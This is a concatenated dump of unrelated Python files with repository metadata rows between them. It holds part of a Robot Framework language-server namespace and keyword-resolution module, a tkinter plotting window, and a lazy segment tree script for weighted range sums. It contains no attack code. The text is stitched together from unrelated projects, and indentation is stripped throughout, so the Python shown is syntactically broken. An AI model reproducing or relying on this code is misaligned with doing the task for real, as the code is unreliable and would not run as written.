imports_manager: ImportsManager,
model: ast.AST,
source: str,
invalidated_callback: Callable[[Namespace], None],
document: Optional[TextDocument] = None,
) -> None:
super().__init__()
self.imports_manager = imports_manager
self.imports_manager.libraries_changed.add(self.libraries_changed)
self.imports_manager.resources_changed.add(self.resources_changed)
self.model = model
self.source = source
self.invalidated_callback = invalidated_callback
self._document = weakref.ref(document) if document is not None else None
self._libraries: OrderedDict[str, LibraryEntry] = OrderedDict()
self._resources: OrderedDict[str, ResourceEntry] = OrderedDict()
self._variables: OrderedDict[str, VariablesEntry] = OrderedDict()
self._initialized = False
self._initialize_lock = asyncio.Lock()
self._analyzed = False
self._analyze_lock = asyncio.Lock()
self._library_doc: Optional[LibraryDoc] = None
self._imports: Optional[List[Import]] = None
self._own_variables: Optional[List[VariableDefinition]] = None
self._diagnostics: List[Diagnostic] = []
self._keywords: Optional[List[KeywordDoc]] = None
self._loop = asyncio.get_event_loop()
# TODO: how to get the search order from model
self.search_order: Tuple[str, ...] = ()
@property
def document(self) -> Optional[TextDocument]:
return self._document() if self._document is not None else None
async def libraries_changed(self, sender: Any, params: List[LibraryDoc]) -> None:
for p in params:
if any(e for e in self._libraries.values() if e.library_doc == p):
self.invalidated_callback(self)
break
async def resources_changed(self, sender: Any, params: List[LibraryDoc]) -> None:
for p in params:
if any(e for e in self._resources.values() if e.library_doc.source == p.source):
self.invalidated_callback(self)
break
@_logger.call
async def get_diagnostics(self) -> List[Diagnostic]:
await self.ensure_initialized()
await self._analyze()
return self._diagnostics
@_logger.call
async def get_libraries(self) -> OrderedDict[str, LibraryEntry]:
await self.ensure_initialized()
return self._libraries
@_logger.call
async def get_resources(self) -> OrderedDict[str, ResourceEntry]:
await self.ensure_initialized()
return self._resources
async def get_library_doc(self) -> LibraryDoc:
from ..parts.documents_cache import DocumentType
if self._library_doc is None:
model_type = ""
if hasattr(self.model, "model_type"):
t = getattr(self.model, "model_type")
if t == DocumentType.RESOURCE:
model_type = "RESOURCE"
elif t == DocumentType.GENERAL:
model_type = "TESTCASE"
elif t == DocumentType.INIT:
model_type = "INIT"
self._library_doc = await self.imports_manager.get_libdoc_from_model(
self.model, self.source, model_type=model_type
)
return self._library_doc
@_logger.call
async def ensure_initialized(self) -> bool:
async with self._initialize_lock:
if not self._initialized:
imports = await self.get_imports()
if self.document is not None:
old_imports: List[Import] = self.document.get_data(Namespace)
if old_imports is None:
self.document.set_data(Namespace, imports)
elif old_imports != imports:
new_imports = []
for e in old_imports:
if e in imports:
new_imports.append(e)
for e in imports:
if e not in new_imports:
new_imports.append(e)
self.document.set_data(Namespace, new_imports)
await self._import_default_libraries()
await self._import_imports(imports, str(Path(self.source).parent), top_level=True)
self._initialized = True
return self._initialized
@property
def initialized(self) -> bool:
return self._initialized
async def get_imports(self) -> List[Import]:
if self._imports is None:
self._imports = await ImportVisitor().get(self.source, self.model)
return self._imports
async def get_own_variables(self) -> List[VariableDefinition]:
if self._own_variables is None:
self._own_variables = await VariablesVisitor().get(self.source, self.model)
return self._own_variables
_builtin_variables: Optional[List[BuiltInVariableDefinition]] = None
@classmethod
def get_builtin_variables(cls) -> List[BuiltInVariableDefinition]:
if cls._builtin_variables is None:
cls._builtin_variables = [BuiltInVariableDefinition(0, 0, 0, 0, "", n, None) for n in BUILTIN_VARIABLES]
return cls._builtin_variables
def get_command_line_variables(self) -> List[VariableDefinition]:
if self.imports_manager.config is None:
return []
return [
CommandLineVariableDefinition(0, 0, 0, 0, "", f"${{{k}}}", None)
for k in self.imports_manager.config.variables.keys()
]
async def get_variables(
self, nodes: Optional[List[ast.AST]] = None, position: Optional[Position] = None
) -> Dict[VariableMatcher, VariableDefinition]:
from robot.parsing.model.blocks import Keyword, TestCase
await self.ensure_initialized()
result: Dict[VariableMatcher, VariableDefinition] = {}
async for var in async_chain(
*[
await BlockVariableVisitor().get(self.source, n, position)
for n in nodes or []
if isinstance(n, (Keyword, TestCase))
],
(e for e in await self.get_own_variables()),
*(e.variables for e in self._resources.values()),
(e for e in self.get_command_line_variables()),
(e for e in self.get_builtin_variables()),
):
if var.name is not None and VariableMatcher(var.name) not in result.keys():
result[VariableMatcher(var.name)] = var
return result
async def find_variable(
self, name: str, nodes: Optional[List[ast.AST]], position: Optional[Position] = None
) -> Optional[VariableDefinition]:
return (await self.get_variables(nodes, position)).get(VariableMatcher(name), None)
async def _import_imports(self, imports: Iterable[Import], base_dir: str, *, top_level: bool = False) -> None:
async def _import(value: Import) -> Optional[LibraryEntry]:
result: Optional[LibraryEntry] = None
try:
if isinstance(value, LibraryImport):
if value.name is None:
raise NameSpaceError("Library setting requires value.")
result = await self._get_library_entry(
value.name, value.args, value.alias, base_dir, sentinel=value
)
result.import_range = value.range()
result.import_source = value.source
if (
top_level
and result.library_doc.errors is None
and (len(result.library_doc.keywords) == 0 and not bool(result.library_doc.has_listener))
):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=f"Imported library '{value.name}' contains no keywords.",
severity=DiagnosticSeverity.WARNING,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
elif isinstance(value, ResourceImport):
if value.name is None:
raise NameSpaceError("Resource setting requires value.")
source = await self.imports_manager.find_file(value.name, base_dir)
# already imported; skip duplicate resource files
if any(r for r in self._resources.values() if r.library_doc.source == source):
return None
result = await self._get_resource_entry(value.name, base_dir, sentinel=value)
result.import_range = value.range()
result.import_source = value.source
if top_level and (
not result.library_doc.errors
and not result.imports
and not result.variables
and not result.library_doc.keywords
):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=f"Imported resource file '{value.name}' is empty.",
severity=DiagnosticSeverity.WARNING,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
elif isinstance(value, VariablesImport):
# TODO: variables
# if value.name is None:
# raise NameSpaceError("Variables setting requires value.")
# result = await self._get_variables_entry(value.name, value.args, base_dir)
# result.import_range = value.range()
# result.import_source = value.source
pass
else:
raise DiagnosticsError("Unknown import type.")
if top_level and result is not None:
if result.library_doc.source is not None and result.library_doc.errors:
if any(err.source for err in result.library_doc.errors):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message="Import definition contains errors.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(Uri.from_path(err.source)),
range=Range(
start=Position(
line=err.line_no - 1
if err.line_no is not None
else result.library_doc.line_no
if result.library_doc.line_no >= 0
else 0,
character=0,
),
end=Position(
line=err.line_no - 1
if err.line_no is not None
else result.library_doc.line_no
if result.library_doc.line_no >= 0
else 0,
character=0,
),
),
),
message=err.message,
)
for err in result.library_doc.errors
if err.source is not None
],
)
)
for err in filter(lambda e: e.source is None, result.library_doc.errors):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=err.message,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=err.type_name,
)
)
elif result.library_doc.errors is not None:
for err in result.library_doc.errors:
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=err.message,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=err.type_name,
)
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
if top_level:
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=str(e),
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=type(e).__qualname__,
)
)
return result
for entry in await asyncio.gather(*(_import(v) for v in imports), return_exceptions=True):
if isinstance(entry, (asyncio.CancelledError, SystemExit, KeyboardInterrupt)):
raise entry
if entry is not None:
if isinstance(entry, ResourceEntry):
assert entry.library_doc.source is not None
already_imported_resources = [
e for e in self._resources.values() if e.library_doc.source == entry.library_doc.source
]
if not already_imported_resources and entry.library_doc.source != self.source:
self._resources[entry.import_name] = entry
try:
await self._import_imports(
entry.imports,
str(Path(entry.library_doc.source).parent),
top_level=False,
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
if top_level:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message=str(e) or type(entry).__name__,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=type(e).__qualname__,
)
)
else:
if top_level:
if entry.library_doc.source == self.source:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message="Recursive resource import.",
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
elif already_imported_resources and already_imported_resources[0].library_doc.source:
self._resources[entry.import_name] = entry
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message="Resource already imported.",
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(
Uri.from_path(already_imported_resources[0].import_source)
),
range=already_imported_resources[0].import_range,
),
message="",
)
],
)
)
else:
if entry.name == BUILTIN_LIBRARY_NAME and entry.alias is None:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message=f'Library "{entry}" is not imported,'
' because it would override the "BuiltIn" library.',
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(Uri.from_path(entry.import_source)),
range=entry.import_range,
),
message="",
)
],
)
)
continue
already_imported_library = [
e
for e in self._libraries.values()
if e.library_doc.source == entry.library_doc.source
and e.alias == entry.alias
and e.args == entry.args
]
if top_level and already_imported_library and already_imported_library[0].library_doc.source:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message=f'Library "{entry}" already imported.',
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(Uri.from_path(already_imported_library[0].import_source)),
range=already_imported_library[0].import_range,
),
message="",
)
],
)
)
if (entry.alias or entry.name or entry.import_name) not in self._libraries:
self._libraries[entry.alias or entry.name or entry.import_name] = entry
# TODO Variables
async def _import_default_libraries(self) -> None:
async def _import_lib(library: str) -> Optional[LibraryEntry]:
try:
return await self._get_library_entry(
library, (), None, str(Path(self.source).parent), is_default_library=True
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
self._diagnostics.append(
Diagnostic(
range=Range.zero(),
message=f"Can't import default library '{library}': {str(e) or type(e).__name__}",
severity=DiagnosticSeverity.ERROR,
source="Robot",
code=type(e).__qualname__,
)
)
return None
for e in await asyncio.gather(*(_import_lib(library) for library in DEFAULT_LIBRARIES)):
if e is not None:
self._libraries[e.alias or e.name or e.import_name] = e
async def _get_library_entry(
self,
name: str,
args: Tuple[Any, ...],
alias: Optional[str],
base_dir: str,
*,
is_default_library: bool = False,
sentinel: Any = None,
) -> LibraryEntry:
library = await self.imports_manager.get_libdoc_for_library_import(
name, args, base_dir=base_dir, sentinel=None if is_default_library else sentinel
)
return LibraryEntry(name=library.name, import_name=name, library_doc=library, args=args, alias=alias)
async def _get_resource_entry(self, name: str, base_dir: str, sentinel: Any = None) -> ResourceEntry:
namespace = await self.imports_manager.get_namespace_for_resource_import(name, base_dir, sentinel=sentinel)
library_doc = await self.imports_manager.get_libdoc_for_resource_import(name, base_dir, sentinel=sentinel)
return ResourceEntry(
name=library_doc.name,
import_name=name,
library_doc=library_doc,
imports=await namespace.get_imports(),
variables=await namespace.get_own_variables(),
)
# TODO get_variables
@_logger.call
async def get_keywords(self) -> List[KeywordDoc]:
await self.ensure_initialized()
if self._keywords is None:
result: Dict[KeywordMatcher, KeywordDoc] = {}
async for name, doc in async_chain(
(await self.get_library_doc()).keywords.items() if (await self.get_library_doc()) is not None else [],
*(e.library_doc.keywords.items() for e in self._resources.values()),
*(e.library_doc.keywords.items() for e in self._libraries.values()),
):
if KeywordMatcher(name) not in result.keys():
result[KeywordMatcher(name)] = doc
self._keywords = list(result.values())
return self._keywords
@_logger.call
async def _analyze(self) -> None:
if not self._analyzed:
async with self._analyze_lock:
try:
self._diagnostics += await Analyzer().get(self.model, self)
lib_doc = await self.get_library_doc()
if lib_doc.errors is not None:
for err in lib_doc.errors:
self._diagnostics.append(
Diagnostic(
range=Range(
start=Position(
line=((err.line_no - 1) if err.line_no is not None else 0),
character=0,
),
end=Position(
line=((err.line_no - 1) if err.line_no is not None else 0),
character=0,
),
),
message=err.message,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=err.type_name,
)
)
finally:
self._analyzed = True
async def find_keyword(self, name: Optional[str]) -> Optional[KeywordDoc]:
await self.ensure_initialized()
return await KeywordFinder(self).find_keyword(name)
async def find_keyword_threadsafe(self, name: Optional[str]) -> Optional[KeywordDoc]:
return await asyncio.wrap_future(asyncio.run_coroutine_threadsafe(self.find_keyword(name), self._loop))
class DiagnosticsEntry(NamedTuple):
message: str
severity: DiagnosticSeverity
code: Optional[str] = None
class CancelSearchError(Exception):
pass
class KeywordFinder:
def __init__(self, namespace: Namespace) -> None:
super().__init__()
self.namespace = namespace
self.diagnostics: List[DiagnosticsEntry] = []
async def find_keyword(self, name: Optional[str]) -> Optional[KeywordDoc]:
try:
result = await self._find_keyword(name)
if result is None:
self.diagnostics.append(
DiagnosticsEntry(
f"No keyword with name {repr(name)} found.", DiagnosticSeverity.ERROR, "KeywordError"
)
)
return result
except CancelSearchError:
return None
async def _find_keyword(self, name: Optional[str]) -> Optional[KeywordDoc]:
if not name:
self.diagnostics.append(
DiagnosticsEntry("Keyword name cannot be empty.", DiagnosticSeverity.ERROR, "KeywordError")
)
raise CancelSearchError()
if not isinstance(name, str):
self.diagnostics.append(
DiagnosticsEntry("Keyword name must be a string.", DiagnosticSeverity.ERROR, "KeywordError")
)
raise CancelSearchError()
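# resolution order: keywords in this file, explicit "Owner.Name" lookups,
# resources, libraries, then BDD-prefixed forms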
result = await self._get_keyword_from_self(name)
if not result and "." in name:
result = await self._get_explicit_keyword(name)
if not result:
result = await self._get_implicit_keyword(name)
if not result:
result = await self._get_bdd_style_keyword(name)
return result
async def _get_keyword_from_self(self, name: str) -> Optional[KeywordDoc]:
return (await self.namespace.get_library_doc()).keywords.get(name, None)
async def _yield_owner_and_kw_names(self, full_name: str) -> AsyncIterator[Tuple[str, ...]]:
tokens = full_name.split(".")
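# e.g. "Lib.Sub.Keyword" yields ("Lib", "Sub.Keyword") and ("Lib.Sub", "Keyword")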
for i in range(1, len(tokens)):
yield ".".join(tokens[:i]), ".".join(tokens[i:])
async def _get_explicit_keyword(self, name: str) -> Optional[KeywordDoc]:
found: List[Tuple[LibraryEntry, KeywordDoc]] = []
async for owner_name, kw_name in self._yield_owner_and_kw_names(name):
found.extend(await self.find_keywords(owner_name, kw_name))
if len(found) > 1:
self.diagnostics.append(
DiagnosticsEntry(
self._create_multiple_keywords_found_message(name, found, implicit=False),
DiagnosticSeverity.ERROR,
"KeywordError",
)
)
raise CancelSearchError()
return found[0][1] if found else None
async def find_keywords(self, owner_name: str, name: str) -> Sequence[Tuple[LibraryEntry, KeywordDoc]]:
from robot.utils.match import eq
return [
(v, v.library_doc.keywords[name])
async for v in async_chain(self.namespace._libraries.values(), self.namespace._resources.values())
if eq(v.alias or v.name, owner_name) and name in v.library_doc.keywords
]
def _create_multiple_keywords_found_message(
self, name: str, found: Sequence[Tuple[LibraryEntry, KeywordDoc]], implicit: bool = True
) -> str:
error = "Multiple keywords with name '%s' found" % name
if implicit:
error += ". Give the full name of the keyword you want to use"
names = sorted(f"{e[0].alias or e[0].name}.{e[1].name}" for e in found)
return "\n ".join([error + ":"] + names)
async def _get_implicit_keyword(self, name: str) -> Optional[KeywordDoc]:
result = await self._get_keyword_from_resource_files(name)
if not result:
result = await self._get_keyword_from_libraries(name)
return result
async def _get_keyword_from_resource_files(self, name: str) -> Optional[KeywordDoc]:
found: List[Tuple[LibraryEntry, KeywordDoc]] = [
(v, v.library_doc.keywords[name])
async for v in async_chain(self.namespace._resources.values())
if name in v.library_doc.keywords
]
if not found:
return None
if len(found) > 1:
found = await self._get_keyword_based_on_search_order(found)
if len(found) == 1:
return found[0][1]
self.diagnostics.append(
DiagnosticsEntry(
self._create_multiple_keywords_found_message(name, found),
DiagnosticSeverity.ERROR,
"KeywordError",
)
)
raise CancelSearchError()
async def _get_keyword_based_on_search_order(
self, entries: List[Tuple[LibraryEntry, KeywordDoc]]
) -> List[Tuple[LibraryEntry, KeywordDoc]]:
from robot.utils.match import eq
for libname in self.namespace.search_order:
for e in entries:
if eq(libname, e[0].alias or e[0].name):
return [e]
return entries
async def _get_keyword_from_libraries(self, name: str) -> Optional[KeywordDoc]:
found = [
(v, v.library_doc.keywords[name])
async for v in async_chain(self.namespace._libraries.values())
if name in v.library_doc.keywords
]
if not found:
return None
if len(found) > 1:
found = await self._get_keyword_based_on_search_order(found)
if len(found) == 2:
found = await self._filter_stdlib_runner(*found)
if len(found) == 1:
return found[0][1]
self.diagnostics.append(
DiagnosticsEntry(
self._create_multiple_keywords_found_message(name, found),
DiagnosticSeverity.ERROR,
"KeywordError",
)
)
raise CancelSearchError()
async def _filter_stdlib_runner(
self, entry1: Tuple[LibraryEntry, KeywordDoc], entry2: Tuple[LibraryEntry, KeywordDoc]
) -> List[Tuple[LibraryEntry, KeywordDoc]]:
from robot.libraries import STDLIBS
stdlibs_without_remote = STDLIBS - {"Remote"}
if entry1[0].name in stdlibs_without_remote:
standard, custom = entry1, entry2
elif entry2[0].name in stdlibs_without_remote:
standard, custom = entry2, entry1
else:
return [entry1, entry2]
self.diagnostics.append(
DiagnosticsEntry(
self._create_custom_and_standard_keyword_conflict_warning_message(custom, standard),
DiagnosticSeverity.WARNING,
"KeywordError",
)
)
return [custom]
def _create_custom_and_standard_keyword_conflict_warning_message(
self, custom: Tuple[LibraryEntry, KeywordDoc], standard: Tuple[LibraryEntry, KeywordDoc]
) -> str:
custom_with_name = standard_with_name = ""
if custom[0].alias is not None:
custom_with_name = " imported as '%s'" % custom[0].alias
if standard[0].alias is not None:
standard_with_name = " imported as '%s'" % standard[0].alias
return (
f"Keyword '{standard[1].name}' found both from a custom test library "
f"'{custom[0].name}'{custom_with_name} and a standard library '{standard[1].name}'{standard_with_name}. "
f"The custom keyword is used. To select explicitly, and to get "
f"rid of this warning, use either '{custom[0].alias or custom[0].name}.{custom[1].name}' "
f"or '{standard[0].alias or standard[0].name}.{standard[1].name}'."
)
async def _get_bdd_style_keyword(self, name: str) -> Optional[KeywordDoc]:
lower = name.lower()
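# matching is case-insensitive; the recursive _find_keyword call also
# unwraps stacked prefixes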
for prefix in ["given ", "when ", "then ", "and ", "but "]:
if lower.startswith(prefix):
return await self._find_keyword(name[len(prefix) :]) # noqa: E203
return None
| 40.356223 | 120 | 0.519925 | 6,233 | 65,821 | 5.289748 | 0.061287 | 0.010312 | 0.018289 | 0.016954 | 0.589457 | 0.521489 | 0.474265 | 0.444178 | 0.413485 | 0.392132 | 0 | 0.004871 | 0.407378 | 65,821 | 1,630 | 121 | 40.380982 | 0.840388 | 0.010027 | 0 | 0.449521 | 0 | 0.002211 | 0.029126 | 0.004529 | 0 | 0 | 0 | 0.000614 | 0.000737 | 1 | 0.014001 | false | 0.008106 | 0.123066 | 0.008106 | 0.226971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8aa12d673cf3649dc9201dd6e2e41e93e6b37f | 2,513 | py | Python | graph.py | monopolize-all/Wave-Sim | f78cfc3195fcf545d585f3dbdfc9c1b9e59798cc | [
"BSD-3-Clause"
] | 1 | 2022-03-31T03:15:02.000Z | 2022-03-31T03:15:02.000Z | graph.py | monopolize-all/Wave-Sim | f78cfc3195fcf545d585f3dbdfc9c1b9e59798cc | [
"BSD-3-Clause"
] | null | null | null | graph.py | monopolize-all/Wave-Sim | f78cfc3195fcf545d585f3dbdfc9c1b9e59798cc | [
"BSD-3-Clause"
] | 1 | 2022-03-18T09:56:50.000Z | 2022-03-18T09:56:50.000Z | import tkinter
from util import Variable_Slider_Widget
class Graph(tkinter.Toplevel):
PLOTTER_SIZE = (400, 400)
PLOTTER_WIDTH, PLOTTER_HEIGHT = PLOTTER_SIZE
BACKGROUND_COLOUR = "#ffffff"
POINTS_COLOUR = "#000000"
POINTS_OFFSET = PLOTTER_SIZE[0] // 2, PLOTTER_SIZE[1] // 2
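# offset applied so that the coordinate origin sits at the canvas center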
def __init__(self, master: tkinter.Tk):
super().__init__(master)
mx, my = master.winfo_x(), master.winfo_y()
mw, mh = master.winfo_width(), master.winfo_height()
x = mx + mw + 10
y = my
self.geometry(f"+{x}+{y}")
self.canvas = tkinter.Canvas(self, bg = self.BACKGROUND_COLOUR,
width = self.PLOTTER_WIDTH,
height = self.PLOTTER_HEIGHT)
self.canvas.pack()
self.points_drawn_currently = []
self.point_radius = 1
self.point_radius_slider = Variable_Slider_Widget(self, "Pointer radius",
validate_func = self.point_radius_slider_validate)
self.point_radius_slider.set_limits(1, 20)
self.point_radius_slider.set_value(1)
self.point_radius_slider.set_number_of_values(20)
self.point_radius_slider.pack()
self.origin_at_center_bool = 1
def point_radius_slider_validate(self, var = None, indx = None, mode = None):
self.point_radius = self.point_radius_slider.get_value()
points_to_draw = list(self.points_drawn_currently)
self.clear_canvas()
self.draw_points(points_to_draw)
def clear_canvas(self):
self.canvas.delete("all")
self.points_drawn_currently = []
def draw_points(self, points):
for point in points:
self.draw_point(*point)
def get_plotter_range(self):
start_x = start_y = 0
stop_x, stop_y = self.PLOTTER_SIZE
if self.origin_at_center_bool:
start_x -= self.POINTS_OFFSET[0]
start_y -= self.POINTS_OFFSET[1]
stop_x -= self.POINTS_OFFSET[0]
stop_y -= self.POINTS_OFFSET[1]
return (start_x, stop_x), (start_y, stop_y)
    def draw_point(self, x, y):
        # store the original (pre-offset) coordinates first, otherwise a
        # redraw triggered by the radius slider would apply the origin
        # offset a second time
        self.points_drawn_currently.append((x, y))
        if self.origin_at_center_bool:
            x += self.POINTS_OFFSET[0]
            y += self.POINTS_OFFSET[1]
        self.canvas.create_oval(x, y, x, y, width = self.point_radius, fill = self.POINTS_COLOUR)
        #self.canvas.create_line(x, y, x+1, y, fill = self.POINTS_COLOUR)
| 32.636364 | 97 | 0.619976 | 331 | 2,513 | 4.380665 | 0.253776 | 0.089655 | 0.103448 | 0.101379 | 0.314483 | 0.033103 | 0 | 0 | 0 | 0 | 0 | 0.018722 | 0.277358 | 2,513 | 76 | 98 | 33.065789 | 0.779736 | 0.025468 | 0 | 0.074074 | 0 | 0 | 0.015931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.037037 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
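# Illustrative driver for the Graph window above (assumes the util module
# providing Variable_Slider_Widget is importable; the data is made up).
import tkinter

root = tkinter.Tk()
root.update_idletasks()  # so winfo_* report real geometry before Graph reads it
graph = Graph(root)
graph.draw_points([(x, x // 2) for x in range(-100, 100, 2)])
root.mainloop()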
9c8d73a16d474beccfcd4957adb9d6ffb14b93ca | 4,388 | py | Python | segment trees/Tree33_update(add lr)_query(weighted sum)_v2.py | DreamShaded/flykiller.github.io | 37b7abc44544613f56ec994452ddd8d2a4ac8df2 | [
"MIT"
] | 5 | 2021-08-10T18:07:39.000Z | 2022-03-26T08:16:24.000Z | segment trees/Tree33_update(add lr)_query(weighted sum)_v2.py | DreamShaded/flykiller.github.io | 37b7abc44544613f56ec994452ddd8d2a4ac8df2 | [
"MIT"
] | null | null | null | segment trees/Tree33_update(add lr)_query(weighted sum)_v2.py | DreamShaded/flykiller.github.io | 37b7abc44544613f56ec994452ddd8d2a4ac8df2 | [
"MIT"
] | 2 | 2021-03-31T18:14:06.000Z | 2021-08-23T04:15:30.000Z | # we can use Segment Tree 24 and Segment Tree 31 and combine them.
class SegmentTree1: # add arithmetic progressions
def __init__(self, n):
self.size = 1
while self.size < n:
self.size *= 2
self.NO_OPERATION = (0, 0) # it should be neutral with respect to op_modify
self.ZERO = 0
self.T = [0] * (2 * self.size - 1)
self.L = [self.NO_OPERATION] * (2 * self.size - 1)
def op_sum(self, a, b):
return a + b
def propagate(self, x, lx, rx):
if self.L[x] == self.NO_OPERATION or rx - lx == 1:
return
mx = (lx + rx)//2
a, d = self.L[x]
a1, d1 = self.L[2 * x + 1]
a2, d2 = self.L[2 * x + 2]
self.L[2 * x + 1] = a + a1, d + d1
self.L[2 * x + 2] = a + d * (mx - lx) + a2, d + d2
self.T[2 * x + 1] += (2 * a + d*(mx - lx - 1)) * (mx - lx)//2
self.T[2 * x + 2] += (2 * a + d*(mx + rx - 2*lx - 1)) * (rx - mx)//2
self.L[x] = self.NO_OPERATION
def _update(self, l, r, a, d, x, lx, rx):
self.propagate(x, lx, rx)
if l >= rx or lx >= r:
return
if lx >= l and rx <= r:
# print("!!!!", lx, rx, l, r)
a1, d1 = self.L[x]
a2, d2 = a + (lx - l) * d, d
self.L[x] = a1 + a2, d1 + d2
self.T[x] += (2 * a2 + d2 * (rx - lx - 1)) * (rx - lx)//2
return
mx = (lx + rx)//2
self._update(l, r, a, d, 2*x+1, lx, mx)
self._update(l, r, a, d, 2*x+2, mx, rx)
self.T[x] = self.op_sum(self.T[2*x+1], self.T[2*x+2])
def update(self, l, r, a, d):
return self._update(l, r, a, d, 0, 0, self.size)
def _query(self, l, r, x, lx, rx):
self.propagate(x, lx, rx)
if l >= rx or lx >= r:
return self.ZERO
if lx >= l and rx <= r:
return self.T[x]
mx = (lx + rx) // 2
m1 = self._query(l, r, 2 * x + 1, lx, mx)
m2 = self._query(l, r, 2 * x + 2, mx, rx)
return self.op_sum(m1, m2)
def query(self, l, r):
return self._query(l, r, 0, 0, self.size)
class SegmentTree2: # add to range, find sum on range
def __init__(self, n, op_modify, op_sum, ZERO):
self.size = 1
while self.size < n:
self.size *= 2
        self.T = [0] * (2 * self.size - 1) # aggregated sum per node
        self.L = [0] * (2 * self.size - 1) # pending (lazy) per-element addition per node
self.op_modify = op_modify
self.op_sum = op_sum
self.ZERO = ZERO
def _update(self, l, r, v, x, lx, rx):
if l >= rx or lx >= r:
return
if lx >= l and rx <= r:
            self.L[x] = self.op_modify(self.L[x], v, 1) # L holds the per-element pending value, hence factor 1
self.T[x] = self.op_modify(self.T[x], v, rx - lx)
return
mx = (lx + rx)//2
self._update(l, r, v, 2*x+1, lx, mx)
self._update(l, r, v, 2*x+2, mx, rx)
self.T[x] = self.op_modify(self.op_sum(self.T[2*x+1], self.T[2*x+2]), self.L[x], rx - lx)
def update(self, l, r, v):
return self._update(l, r, v, 0, 0, self.size)
def _query(self, l, r, x, lx, rx):
if l >= rx or lx >= r:
return self.ZERO
if lx >= l and rx <= r:
return self.T[x]
mx = (lx + rx) // 2
m1 = self._query(l, r, 2 * x + 1, lx, mx)
m2 = self._query(l, r, 2 * x + 2, mx, rx)
return self.op_modify(self.op_sum(m1, m2), self.L[x], min(rx, r) - max(lx, l)) # careful here!
def query(self, l, r):
return self._query(l, r, 0, 0, self.size)
if __name__ == '__main__':
n, m = [int(i) for i in input().split()]
STree1 = SegmentTree1(n)
STree2 = SegmentTree2(n, lambda a, b, x: a + b*x, lambda a, b: a+b, 0)
arr = [int(i) for i in input().split()]
for i in range(n):
STree1.update(i, i+1, arr[i]*(i+1), 0) # not optimal way
STree2.update(i, i+1, arr[i])
print(STree1.T)
print(STree2.T)
for i in range(m):
t = [int(i) for i in input().split()]
if t[0] == 1:
STree1.update(t[1] - 1, t[2], t[3]*t[1], t[3])
STree2.update(t[1] - 1, t[2], t[3])
#print(STree1.T)
#print(STree2.T)
else:
m1 = STree1.query(t[1] - 1, t[2])
m2 = STree2.query(t[1] - 1, t[2])
print(m1 - m2*(t[1]-1))
#print(m1, m2) | 34.551181 | 103 | 0.459435 | 770 | 4,388 | 2.550649 | 0.116883 | 0.058554 | 0.027495 | 0.021385 | 0.639002 | 0.546334 | 0.446029 | 0.368635 | 0.35336 | 0.308554 | 0 | 0.056091 | 0.362124 | 4,388 | 127 | 104 | 34.551181 | 0.645588 | 0.069052 | 0 | 0.403846 | 0 | 0 | 0.001965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0 | 0.048077 | 0.288462 | 0.028846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
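# Illustrative standalone check of SegmentTree1: add the arithmetic
# progression a=1, d=1 over [0, 3) and query the range sum.
st = SegmentTree1(4)
st.update(0, 3, 1, 1)  # element i in [0, 3) receives 1 + i
print(st.query(0, 3))  # expected: 1 + 2 + 3 = 6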
9c8e3ad5fa1769d9fb66fb1f9d1bd81f7b58b1e3 | 586 | py | Python | letters/sort_by.py | clairempr/letterpress | 05af199018b00ecff847789c71adbf9abc53b3a7 | [
"Apache-2.0"
